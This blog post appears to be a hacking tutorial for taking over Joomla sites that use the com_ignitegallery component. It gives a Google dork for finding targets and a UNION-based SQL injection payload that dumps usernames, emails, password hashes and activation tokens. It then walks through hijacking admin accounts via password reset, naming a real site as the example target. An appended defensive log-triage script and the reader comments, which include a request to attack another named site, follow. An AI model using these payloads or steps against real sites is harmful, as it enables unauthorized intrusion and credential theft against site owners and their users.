Joomla Exploit

-sharing is caring
-don't be lazy about searching on Google :D
-read the steps first..
-the exploit code is available here
======

=step1=

======

search Google with this dork:

inurl:"index.php option=com_ignitegallery"



======

=step2=

======

apply the exploit

exploit:

-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--



example:

http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users--

there, it shows up :D



======

=step3=

======

try a password reset

now we reset the password using this exploit:

/index.php?option=com_user&view=reset



hm.. it asks for an email.. just enter the admin email from before..

then press enter :D



======

=step4=

======


now it asks for an activation token as well; relax, we look up the activation first :D

exploit:

-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,activation),4,5,6,7,8,9,10+from+jos_users--



see, the activation comes out :D



======

=step5=

======

just copy it into the earlier form, then press enter :D



======

=step6=

======

now it asks for a new password :D



======

=step7=

======


ok, now we log in to admin

http://www.kaikourafishing.co.nz/administrator/
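
Added example, not part of the original post: a defender-side log triage for the sequence in the steps above, flagging com_ignitegallery requests whose gallery value is not a plain integer and noting whether the same client then opened the com_user reset view. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges); not from any real site.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_ignitegallery&task=view&gallery=4 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name%29,4+from+jos_users-- HTTP/1.1" 200 7344
203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 2048
198.51.100.4 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<url>\S+) ')


def params(url):
    """Decoded query parameters of a request URL (first value of each)."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query, keep_blank_values=True).items()}


def is_injected_gallery(url):
    """True when com_ignitegallery gets a gallery id that is not a plain integer."""
    q = params(url)
    if q.get("option") != "com_ignitegallery" or "gallery" not in q:
        return False
    return re.fullmatch(r"\d+", q["gallery"]) is None


def is_reset_request(url):
    """True for the com_user password-reset view."""
    q = params(url)
    return q.get("option") == "com_user" and q.get("view") == "reset"


def triage(log_text):
    """Map client IP -> injected requests, and whether a password reset followed."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, url = m["ip"], m["url"]
        if is_injected_gallery(url):
            findings.setdefault(ip, {"requests": [], "reset_followed": False})
            findings[ip]["requests"].append(url)
        elif ip in findings and is_reset_request(url):
            findings[ip]["reset_followed"] = True
    return findings


if __name__ == "__main__":
    for ip, hit in triage(SAMPLE_LOG).items():
        print(ip, len(hit["requests"]), "injected request(s); reset followed:", hit["reset_followed"])
```

On the server side the fix is for the component to cast gallery to an integer or use a parameterized query. A hit with a reset following it means the jos_users password hashes and activation tokens should be treated as disclosed and rotated.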



2 comments

  1. erm..
    can you help exploit this website???
    www.kvkluang.com
  2. hmm... it doesn't work, bro

    500 - Layout "confirm-4unionallselect12group_concatid0x3aname0x3ausername0x3aemail0x3apassword0x3aactivation45678910fromjos_users--" not found
    You may not be able to visit this page because of:
    1. an out-of-date bookmark/favourite
    2. a search engine that has an out-of-date listing for this site
    3. a mistyped address
    4. you have no access to this page
    5. The requested resource was not found.
    6. An error has occurred while processing your request.
    Please try one of the following pages: Home Page
    If difficulties persist, please contact the System Administrator of this site.
    Layout "confirm-4unionallselect12group_concatid0x3aname0x3ausername0x3aemail0x3apassword0x3aactivation45678910fromjos_users--" not found
